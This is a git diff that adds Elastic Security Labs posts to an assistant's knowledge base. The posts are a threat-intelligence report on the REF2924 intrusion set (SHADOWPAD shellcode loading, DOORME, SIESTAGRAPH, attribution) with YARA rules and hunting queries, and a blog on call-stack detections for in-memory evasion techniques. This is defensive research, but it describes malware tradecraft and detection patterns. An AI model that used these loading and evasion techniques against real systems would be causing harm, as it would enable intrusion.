+![Payload is stored encrypted in the registry](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image31.jpg)
+
+Once the contents of **log.dll.dat** have been encrypted and embedded in the registry, the original file will be deleted. On subsequent runs, the shellcode will be loaded directly from the registry key.
+
+#### Shellcode
+
+To execute the shellcode the sample will allocate an [RWX-protected memory region](https://www.ired.team/offensive-security/defense-evasion/finding-all-rwx-protected-memory-regions) using the **VirtualAlloc** Windows API, then write the shellcode to the memory region and pass execution to it with an ESI instruction call.
+
+![log.dll allocate RWX memory for the shellcode](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image25.jpg)
+
+![log.dll pass execution to the shellcode](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image7.png)
+
+![First instruction of the shellcode](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image23.jpg)
+
+### Other SHADOWPAD research
+
+While researching shared code and techniques, Elastic Security Labs identified a [publication from SecureWorks’ CTU](https://www.secureworks.com/research/shadowpad-malware-analysis) that describes the BitDefender sideload vulnerability. Additionally, SecureWorks has shared information describing the functionality of a file, **log.dll.dat** , which is consistent with our observations. The team at [Positive Technologies ETC](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/) also [published detailed research](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/) on SHADOWPAD which aligns with our research.
+
+### SHADOWPAD Summary
+
+SHADOWPAD is a malware family that SecureWorks CTU has associated with the [BRONZE UNIVERSITY](https://www.secureworks.com/research/threat-profiles/bronze-university) threat group and Positive Technologies ETC has associated with the [Winnti group](https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf).
+
+## Campaign and adversary modeling
+
+Our analysis of Elastic telemetry, combined with open sources and compared with third-party reporting, concludes a single nationally-aligned threat group is likely responsible. We identified relationships involving shared malware, techniques, victimology, and observed adversary priorities. Our confidence assessments vary depending on the sourcing and collection fidelity.
+
+We identified significant overlaps in the work of Positive Technologies ETC and [SecureWorks CTU](https://www.secureworks.com/research/shadowpad-malware-analysis) while researching the DOORME, SIESTAGRAPH, and SHADOWPAD implants, and believe these are related activity clusters.
+
+![REF2924 intersections and associations](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image32.jpg)
+
+In the following analysis, we’ll discuss the four campaigns that we associate with this intrusion set including sourcing, intersections, and how each supported our attribution across all campaigns.
+
+1. Winnti - reported by Positive Technologies, January 2021
+2. Undisclosed REF, Winnti - observed by Elastic Security Labs, March 2022
+3. REF2924, ChamelGang, Winnti - reported by Elastic Security Labs, December 2022
+4. Undisclosed REF, ChamelGang - observed by Elastic Security Labs, December 2022
+
+### Winnti
+
+In January of 2021, the team at Positive Technologies ETC [published research](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/) that overlapped with our observations for REF2924; specifically SHADOWPAD malware deployed with the file names **log.dll** and **log.dll.dat** and using the same sample of BitDefender we observed as a DLL injection vehicle.
+
+While the research from Positive Technologies ETC covered a different activity cluster, the adversary deployed a similar variant of SHADOWPAD, used a similar file naming methodology, and leveraged similar procedure-level capabilities; these consistencies contribute to our conclusion that REF2924 is related. In the graphic above, we use a dashed line to represent third-party consensus and moderate confidence because, while the reporting appears thorough and sound, we cannot independently validate all findings.
+
+### Undisclosed REF, Winnti
+
+In early 2022, Elastic observed a short-lived intrusion into a telecommunications provider in Afghanistan. Using code analysis and event sampling, we internally attributed these sightings to WINNTI malware implants and external research overlaps with the [Winnti Group](https://attack.mitre.org/groups/G0044/). We continue to track this intrusion set, independently of and in relation to REF2924 observations.
+
+### REF2924, ChamelGang, Winnti
+
+In early December 2022, we [observed](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry) Powershell commands used to collect and export mailboxes from an internet-connected Microsoft Exchange server for the Foreign Affairs Office of an Association of Southeast Asian Nations (ASEAN) member. Our research identified the presence of the DOORME backdoor, SHADOWPAD, and a new malware implant we call SIESTAGRAPH (discussed in the SIESTAGRAPH code analysis section above).
+
+In researching the events of REF2924, we believe they are consistent with details noted by [Positive Technologies' research into ChamelGang](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/), and likely represent the actions of one group with shared goals.
+
+### Undisclosed REF, ChamelGang
+
+Using the DOORME IIS backdoor that we collected during research into REF2924, we developed a scanner that identified the presence of DOORME on an internet-connected Exchange server at a second telecommunications provider in Afghanistan.
+
+### Campaign associations
+
+Building associations between events, especially when relying on third-party reporting, is a delicate balance between surfacing value from specific observations and suppressing noise from circular reporting. Details reported by research teams and consisting of atomic indicators, techniques, procedures, and capabilities provide tremendous value in spotting associations between activity clusters. Elements of evidence that are repeated multiple times via circular reporting can lead to over-weighting that evidence. In analyzing these activity clusters, we have specific observations from our telemetry (host artifacts, capabilities, functionality, and adversary techniques) and third-party reporting consistent with our findings.
+
+We use third-party reporting as supporting, but not factual, evidence to add context to our specific observations. It may be possible to verify a third-party had firsthand visibility of a threat, but that’s a rare luxury. We used estimative language in building associations where appropriate.
+
+To uncover potential associations among these campaigns, we weighed host artifacts, tools, and TTPs more heavily than transitory atomic indicators like hashes, IP addresses, and domains.
+
+We’ll discuss notable (non-exhaustive) overlaps in the following section.
+
+#### Campaigns 1 and 3
+
+Campaigns 1 ([Winnti](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/)) and 3 ([REF2924, ChamelGang, Winnti](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry)) are related by several elements: the use of the SHADOWPAD malware family, the specific file names ( **log.dll** and **log.dll.dat** ), and the injection technique using the same BitDefender hash.
+
+#### Campaigns 3 and 4
+
+Campaigns 3 (REF2924, ChamelGang, Winnti) and 4 (Undisclosed REF, ChamelGang) are related by the presence of a specifically configured DOORME backdoor and a shared national strategic interest for the adversary.
+
+Using network scan results for about 180k publicly-accessible Exchange servers, and specific authentication elements uncovered while reverse engineering REF2924’s DOORME sample, we were able to identify an identical DOORME configuration at a second telecommunications provider in Afghanistan. This was a different victim than Campaign 2 (Undisclosed REF, Winnti).
+
+While the DOORME IIS backdoor is not widely prevalent, simply having DOORME in your environment isn’t a strong enough data point to build an association. The presence of this DOORME configuration, when compared to a search of 180k other Exchange servers and the moderate confidence of the national strategic interests, led us to associate Campaigns 3 and 4 together with high confidence and that Campaign 4 was also a part of the same threat group.
+
+## Summary
+
+DOORME allows for a threat actor to access a targeted network through the use of a backdoored IIS module on an internet-connected server. DOORME includes the capability to collect information about the infected host, upload shellcode chunks to evade detection, and execute shellcode in memory.
+
+SIESTAGRAPH is an implant discovered by Elastic Security Labs that uses the Microsoft Graph API for command and control. The Graph API is used for interacting with Microsoft Office 365, so C2 communication would be largely masked by legitimate network traffic. Elastic Security Labs has reported the tenant ID hard coded into SIESTAGRAPH to Microsoft.
+
+Based on our code analysis and the limited internet presence of DOORME and SIESTAGRAPH, we believe that this intrusion set is used by a limited distribution, or singular, threat actor.
+
+SHADOWPAD is a modular malware family that is used as a way to load and execute shellcode onto a victim system. While it has been tracked since 2017, SHADOWPAD continues to be a capable and popular remote access and persistence tool.
+
+The REF2924 intrusion set, using SIESTAGRAPH, DOORME, SHADOWPAD, and the system binary proxy execution technique (among others) represents an attack group that appears focused on priorities that, when observed across campaigns, align with a sponsored national strategic interest.
+
+## Detections
+
+### Hunting queries
+
+Hunting queries are used as a starting point for potentially malicious events, but because every environment is different, an investigation should be completed.
+
+The following KQL query can be used to hunt for additional behaviors related to SIESTAGRAPH. This query looks for processes that are making DNS queries to graph.microsoft.com where the process does not have a trusted code-signing certificate or the process is not signed by Microsoft.
+
+```
+dns.question.name : "graph.microsoft.com" and (process.code_signature.trusted : “false” or not (process.code_signature.subject_name : "Microsoft Windows" or process.code_signature.subject_name : "Microsoft Windows Publisher" or process.code_signature.subject_name : "Microsoft Corporation")) and process.name : *
+```
+
+### Signatures
+
+- [Windows.Trojan.DoorMe](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_DoorMe.yar)
+- [Windows.Trojan.SiestaGraph](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_SiestaGraph.yar)
+- [Windows.Trojan.ShadowPad](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_ShadowPad.yar)
+
+### YARA rules
+
+#### The DOORME IIS module
+
+```
+rule Windows_Trojan_DoorMe {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2022-12-09"
+        last_modified = "2022-12-15"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "DoorMe"
+        threat_name = "Windows.Trojan.DoorMe"
+        license = "Elastic License v2"
+    strings:
+        $seq_aes_crypto = { 8B 6C 24 ?? C1 E5 ?? 8B 5C 24 ?? 8D 34 9D ?? ?? ?? ?? 0F B6 04 31 32 44 24 ?? 88 04 29 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 32 44 24 ?? 88 44 29 ?? 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 44 30 F8 88 44 29 ?? 8D 04 9D ?? ?? ?? ?? 0F B6 04 01 44 30 E0 88 44 29 ?? 8B 74 24 ?? }
+        $seq_copy_str = { 48 8B 44 24 ?? 48 89 58 ?? 48 89 F1 4C 89 F2 49 89 D8 E8 ?? ?? ?? ?? C6 04 1E ?? }
+        $seq_md5 = { 89 F8 44 21 C8 44 89 C9 F7 D1 21 F1 44 01 C0 01 C8 44 8B AC 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ?? 44 89 44 24 ?? 46 8D 04 28 41 81 C0 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 41 C1 C0 ?? 45 01 C8 44 89 C1 44 21 C9 44 89 C2 F7 D2 21 FA 48 89 BC 24 ?? ?? ?? ?? 8D 2C 1E 49 89 DC 01 D5 01 E9 81 C1 ?? ?? ?? ?? C1 C1 ?? 44 01 C1 89 CA 44 21 C2 89 CD F7 D5 44 21 CD 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 8D 1C 07 01 EB 01 DA 81 C2 ?? ?? ?? ?? C1 C2 ?? }
+        $seq_calc_key = { 31 FF 48 8D 1D ?? ?? ?? ?? 48 83 FF ?? 4C 89 F8 77 ?? 41 0F B6 34 3E 48 89 F1 48 C1 E9 ?? 44 0F B6 04 19 BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 E6 ?? 44 0F B6 04 1E BA ?? ?? ?? ?? 48 8B 4D ?? E8 ?? ?? ?? ?? 48 83 C7 ?? }
+        $seq_base64 = { 8A 45 ?? 8A 4D ?? C0 E0 ?? 89 CA C0 EA ?? 80 E2 ?? 08 C2 88 55 ?? C0 E1 ?? 8A 45 ?? C0 E8 ?? 24 ?? 08 C8 88 45 ?? 41 83 C4 ?? 31 F6 44 39 E6 7D ?? 66 90 }
+        $str_0 = ".?AVDoorme@@" ascii fullword
+    condition:
+        3 of ($seq*) or 1 of ($str*)
+}
+```
+
+#### The SIESTAGRAPH implant
+
+```
+rule Windows_Trojan_SiestaGraph {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2022-12-14"
+        last_modified = "2022-12-15"
+        os = "windows"
+        arch_context = "x86"
+        category_type = “Trojan”
+        family = “SiestaGraph”
+        threat_name = "Windows.Trojan.SiestaGraph"
+        license = "Elastic License v2"
+    strings:
+        $a1 = "downloadAsync" ascii nocase fullword
+        $a2 = "UploadxAsync" ascii nocase fullword
+        $a3 = "GetAllDriveRootChildren" ascii fullword
+        $a4 = "GetDriveRoot" ascii fullword
+        $a5 = "sendsession" wide fullword
+        $b1 = "ListDrives" wide fullword
+        $b2 = "Del OK" wide fullword
+        $b3 = "createEmailDraft" ascii fullword
+        $b4 = "delMail" ascii fullword
+    condition:
+        all of ($a*) and 2 of ($b*)
+}
+```
+
+#### The SHADOWPAD malware family
+
+```
+rule Windows_Trojan_ShadowPad_1 {
+	meta:
+		author = "Elastic Security"
+		creation_date = "2023-01-23"
+		last_modified = "2023-01-31"
+		description = "Target SHADOWPAD obfuscation loader+payload"
+		os = "Windows"
+		arch = "x86"
+		category_type = "Trojan"
+		family = "ShadowPad"
+		threat_name = "Windows.Trojan.ShadowPad"
+		license = "Elastic License v2"
+	strings:
+		$a1 = { 87 0? 24 0F 8? }
+		$a2 = { 9C 0F 8? }
+		$a3 = { 03 0? 0F 8? }
+		$a4 = { 9D 0F 8? }
+		$a5 = { 87 0? 24 0F 8? }
+	condition:
+		all of them
+}
+rule Windows_Trojan_Shadowpad_2 {
+	meta:
+		author = "Elastic Security"
+		creation_date = "2023-01-31"
+		last_modified = "2023-01-31"
+		description = "Target SHADOWPAD loader"
+		os = "Windows"
+		arch = "x86"
+		category_type = "Trojan"
+		family = "Shadowpad"
+		threat_name = "Windows.Trojan.Shadowpad"
+		license = "Elastic License v2"
+	strings:
+		$a1 = "{%8.8x-%4.4x-%4.4x-%8.8x%8.8x}"
+	condition:
+		all of them
+}
+rule Windows_Trojan_Shadowpad_3 {
+	meta:
+		author = "Elastic Security"
+		creation_date = "2023-01-31"
+		last_modified = "2023-01-31"
+		description = "Target SHADOWPAD payload"
+		os = "Windows"
+		arch = "x86"
+		category_type = "Trojan"
+		family = "Shadowpad"
+		threat_name = "Windows.Trojan.Shadowpad"
+		license = "Elastic License v2"
+	strings:
+		$a1 = "hH#whH#w" fullword
+		$a2 = "Yuv~YuvsYuvhYuv]YuvRYuvGYuv1:tv<Yuvb#tv1Yuv-8tv&Yuv" fullword
+		$a3 = "pH#wpH#w" fullword
+		$a4 = "HH#wHH#wA" fullword
+		$a5 = "xH#wxH#w:$" fullword
+		$re1 = /(HTTPS|TCP|UDP):\/\/[^:]+:443/
+	condition:
+		4 of them
+}
+```
+
+## References
+
+- [https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry)
+- [https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/](https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/)
+- [https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad](https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad)
+- [https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/)
+- [https://www.secureworks.com/research/shadowpad-malware-analysis](https://www.secureworks.com/research/shadowpad-malware-analysis)
+- [https://www.secureworks.com/research/threat-profiles/bronze-university](https://www.secureworks.com/research/threat-profiles/bronze-university)
+- [https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf](https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf)
+- [https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/)
+
+## Indicators
+
+Artifacts are available from the [previously published REF2924 research](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry#observables).
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/upping_the_ante_detecting_in_memory_threats_with_kernel_call_stacks.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/upping_the_ante_detecting_in_memory_threats_with_kernel_call_stacks.md
new file mode 100644
index 0000000000000..a8caa2362305a
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/upping_the_ante_detecting_in_memory_threats_with_kernel_call_stacks.md
@@ -0,0 +1,135 @@
+---
+title: "Upping the Ante: Detecting In-Memory Threats with Kernel Call Stacks"
+slug: "upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks"
+date: "2023-05-31"
+description: "We aim to out-innovate adversaries and maintain protections against the cutting edge of attacker tradecraft. With Elastic Security 8.8, we added new kernel call stack based detections which provide us with improved efficacy against in-memory threats."
+author:
+  - slug: joe-desimone
+  - slug: samir-bousseaden
+  - slug: gabriel-landau
+image: "blog-thumb-coin-stacks.jpg"
+category:
+  - slug: security-research
+---
+
+## Intro
+
+Elastic Security for endpoint, with its roots in Endgame, has long led the industry for in-memory threat detection. We [pioneered](https://www.elastic.co/security-labs/hunting-memory) and patented many detection technologies such as kernel [thread start](https://image-ppubs.uspto.gov/dirsearch-public/print/downloadPdf/20170329973) preventions, call stack [anomaly hunting](https://image-ppubs.uspto.gov/dirsearch-public/print/downloadPdf/11151247), and [module stomping](https://image-ppubs.uspto.gov/dirsearch-public/print/downloadPdf/11151251) discovery. However, adversaries continue to innovate and evade detections. For example, in response to our improved [memory signature](https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures) protection, adversaries developed a flurry of new [sleep based](https://www.cobaltstrike.com/blog/cobalt-strike-and-yara-can-i-have-your-signature/) evasions. We aim to out-innovate adversaries and maintain protections against the cutting edge of attacker tradecraft. With Elastic Security 8.8, we added new kernel call stack based detections which provide us with improved efficacy against in-memory threats.
+
+Before we get started, it's important to know what call stacks are and why they’re valuable for detection engineering. A [call stack](https://en.wikipedia.org/wiki/Call_stack) is the ordered sequence of functions that are executed to achieve a behavior of a program. It shows in detail which functions (and their associated modules) were executed to lead to a behavior like a new file or process being created. Knowing a behavior’s call stack, we can build detections with detailed contextual information about what a program is doing and how it’s doing it.
+
+## Deep Visibility
+
+The new call stack based detection capability leverages our existing deep in-line kernel visibility for the most common system behaviors (process, file, registry, library, etc). With each event, we capture the call stack for the activity. This is later enriched with module information, symbols, and evidence of suspicious activity. This gives us [procmon](https://learn.microsoft.com/en-us/sysinternals/downloads/procmon)-like visibility in real-time, powering advanced preventions for in-memory tradecraft.
+
+Process creation call stack fields : ![](/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image12.jpg)
+
+File, registry and library call stack fields: ![](/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image8.jpg)
+
+## New Rules
+
+Additional visibility wouldn’t raise the bar unless we could pair it with tuned, high confidence preventions. In 8.8, behavior protection comes out of the box with 30+ rules to provide us with high efficacy against cutting edge attacker techniques such as: - Direct syscalls - Callback-based evasion - Module Stomping - Library loading from unbacked region - Process created from unbacked region - Many more
+
+Call stacks are a powerful data source that can be used to improve protection against non-memory-based threats as well. For example, the following EQL queries look for the creation of a child process or an executable file extension from an Office process with a call stack containing `VBE7.dll` (a strong sign of the presence of a macro-enabled document). This increases the signal and coverage of the rule logic while reducing the necessary tuning efforts compared to just process or file creation events with no call stack information:
+
+![](/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image29.jpg)
+
+Below are some examples of matches where Macro-enabled malicious Excel and Word documents spawning a child process where the call stack refers to `vbe7.dll` :
+
+![](/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image9.jpg)
+
+Here, we can see a malicious XLL file opened via Excel spawning a legitimate `browser\_broker.exe` to inject into. The parent call stack indicates that the process creation call is coming from the `[xlAutoOpen](https://learn.microsoft.com/en-us/office/client-developer/excel/xlautoopen)` function:
+
+![](/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image11.jpg)
+
+The same enrichment is also valuable in library load and registry events. Below is an example of loading the Microsoft Common Language Runtime `CLR.DLL` module from a suspicious call stack (unbacked memory region with RWX permissions) using the [Sliver execute-assembly](https://github.com/BishopFox/sliver/wiki/Using-3rd-party-tools) command to load external .NET assemblies:
+
+```
+library where dll.name : "clr.dll" and
+process.thread.Ext.call_stack_summary : "*mscoreei.dll|Unbacked*"
+```
+
+![](/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image4.jpg)
+
+Hunting for suspicious modification of certain registry keys such as the Run key for persistence tends to be noisy and very common in legit software but if we add the call stack signal to the logic, the suspicion level is significantly increased :
+
+```
+registry where 
+ registry.path : "H*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*"
+// the creating thread's stack contains frames pointing outside any known executable image
+ and process.thread.Ext.call_stack_contains_unbacked == true
+```
+
+![](/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image2.jpg)
+
+Another “fun” example is the use of the call stack information to detect rogue instances of core system processes that normally have very specific functionality. By signaturing their normal call stacks, we can easily identify outliers. For example, `WerFault.exe` and `wermgr.exe` are among the most attractive targets for masquerading:
+
+![](/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image30.jpg)
+
+Examples of matches:
+
+![](/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image9.jpg)
+
+Apart from the use of call stack data for finding suspicious behaviors, it’s also useful when it comes to excluding false positives from behavior detections in a more granular way. This also helps reduce evasion opportunities.
+
+A good example is a detection rule looking for unusual Microsoft Office child processes. This rule is used to [exclude](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_microsoft_office_fetching_remote_content.toml#L26) `splwow64.exe` , which can be legitimately spawned by printing activity. Excluding it by `process.executable` creates an evasion opportunity via process hollowing or injection, which can make the process tree look normal. We can now mitigate this evasion by requiring such process creations to come from `winspool.drv!OpenPrinter` :
+
+```
+process where event.action == "start" and
+  process.parent.name : ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "MSACCESS.EXE", "mspub.exe", "fltldr.exe", "visio.exe") and
+// excluding splwow64.exe only if it’s parent callstack is coming from winspool.drv module  
+not (process.executable : "?:\\Windows\\splwow64.exe" and``_arraysearch(process.parent.thread.Ext.call_stack, $entry, $entry.symbol_info: ("?:\\Windows\\System32\\winspool.drv!OpenPrinter*", "?:\\Windows\\SysWOW64\\winspool.drv!OpenPrinter*")))
+```
+
+![](/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image3.jpg)
+
+To reduce event volumes, call stack information is collected on the endpoint and processed for detections but not always streamed in events. To always include call stacks in streamed events an advanced option is available in Endpoint policy:
+
+![](/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image7.jpg)
+
+## C2 Coverage
+
+Elastic Endpoint makes quick work detecting some of the top C2 frameworks active today. See below for a screenshot detecting Nighthawk, BruteRatel, CobaltStrike, and ATP41’s [StealthVector](https://www.trendmicro.com/vinfo/gb/security/news/cybercrime-and-digital-threats/earth-baku-returns).
+
+![](/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image5.jpg)
+
+![](/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image10.jpg)
+
+## Conclusion
+
+While this capability gives us a lead over the cutting edge of in-memory tradecraft today, attackers will no doubt develop [new innovations](https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs) in attempts to evade it. That’s why we are already hard at work to deliver the next set of leading in-memory detections. Stay tuned!
+
+## Resources
+
+Rules released with 8.8: 
+- [Execution from a Macro Enabled Office Document](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_execution_from_a_macro_enabled_office_document.toml) 
+- [Suspicious Macro Execution via Windows Scripts](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_suspicious_macro_execution_via_windows_scripts.toml) 
+- [Suspicious File Dropped by a Macro Enabled Document](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_suspicious_file_dropped_by_a_macro_enabled_document.toml) 
+- [Shortcut File Modification via Macro Enabled Document](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_shortcut_file_modification_via_macro_enabled_document.toml) 
+- [DLL Loaded from a Macro Enabled Document](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_dll_loaded_from_a_macro_enabled_document.toml) 
+- [Process Creation via Microsoft Office Add-Ins](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_process_creation_via_microsoft_office_add_ins.toml) 
+- [Registry or File Modification from Suspicious Memory](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/persistence_registry_or_file_modification_from_suspicious_memory.toml) 
+- [Access to Browser Credentials from Suspicious Memory](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_access_to_browser_credentials_from_suspicious_memory.toml) 
+- [Potential NTDLL Memory Unhooking](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_ntdll_memory_unhooking.toml) 
+- [Microsoft Common Language Runtime Loaded from Suspicious Memory](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_microsoft_common_language_runtime_loaded_from_suspicious_memory.toml) 
+- [Common Language Runtime Loaded via an Unsigned Module](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_common_language_runtime_loaded_via_an_unsigned_module.toml) 
+- [Potential Masquerading as Windows Error Manager](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_masquerading_as_windows_error_manager.toml) 
+- [Suspicious Image Load via LdrLoadDLL](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_image_load_via_ldrloaddll.toml) 
+- [Library Loaded via a CallBack Function](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_library_loaded_via_a_callback_function.toml) 
+- [Process Creation from Modified NTDLL](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_process_creation_from_modified_ntdll.toml) 
+- [DLL Side Loading via a Copied Microsoft Executable](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_dll_side_loading_via_a_copied_microsoft_executable.toml) 
+- [Potential Injection via the Console Window Class](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_injection_via_the_console_window_class.toml) 
+- [Suspicious Unsigned DLL Loaded by a Trusted Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_unsigned_dll_loaded_by_a_trusted_process.toml) 
+- [Process Started via Remote Thread](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_process_stared_via_remote_thread.toml) 
+- [Potential Injection via DotNET Debugging](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_injection_via_dotnet_debugging.toml) 
+- [Potential Process Creation via ShellCode](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_process_creation_via_shellcode.toml) 
+- [Module Stomping form a Copied Library](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_module_stomping_form_a_copied_library.toml) 
+- [Process Creation from a Stomped Module](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_process_creation_from_a_stomped_module.toml) 
+- [Parallel NTDLL Loaded from Unbacked Memory](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_parallel_ntdll_loaded_from_unbacked_memory.toml) 
+- [Potential Operation via Direct Syscall](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_operation_via_direct_syscall.toml) 
+- [Potential Process Creation via Direct Syscall](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_process_creation_via_direct_syscall.toml) 
+- [Process from Archive or Removable Media via Unbacked Code](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_process_from_archive_or_removable_media_via_unbacked_code.toml) 
+- [Network Module Loaded from Suspicious Unbacked Memory](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_network_module_loaded_from_suspicious_unbacked_memory.toml) 
+- [Rundll32 or Regsvr32 Loaded a DLL from Unbacked Memory](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_rundll32_or_regsvr32_loaded_a_dll_from_unbacked_memory.toml) 
+- [Windows Console Execution from Unbacked Memory](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_windows_console_execution_from_unbacked_memory.toml) 
+- [Process Creation from Unbacked Memory via Unsigned Parent](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_process_creation_from_unbacked_memory_via_unsigned_parent.toml)
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/using_llms_and_esre_to_find_similar_user_sessions.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/using_llms_and_esre_to_find_similar_user_sessions.md
new file mode 100644
index 0000000000000..696fc1e37286e
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/using_llms_and_esre_to_find_similar_user_sessions.md
@@ -0,0 +1,121 @@
+---
+title: "Using LLMs and ESRE to find similar user sessions"
+slug: "using-llms-and-esre-to-find-similar-user-sessions"
+date: "2023-09-19"
+description: "In our previous article, we explored using the GPT-4 Large Language Model (LLM) to condense Linux user sessions. In the context of the same experiment, we dedicated some time to examine sessions that shared similarities. These similar sessions can subsequently aid the analysts in identifying related suspicious activities."
+author:
+  - slug: kirti-sodhi
+  - slug: susan-chang
+  - slug: apoorva-joshi
+image: "photo-edited-03@2x.jpg"
+category:
+  - slug: detection-science
+  - slug: machine-learning
+  - slug: generative-ai
+---
+
+## Using LLMs and ESRE to find similar user sessions
+
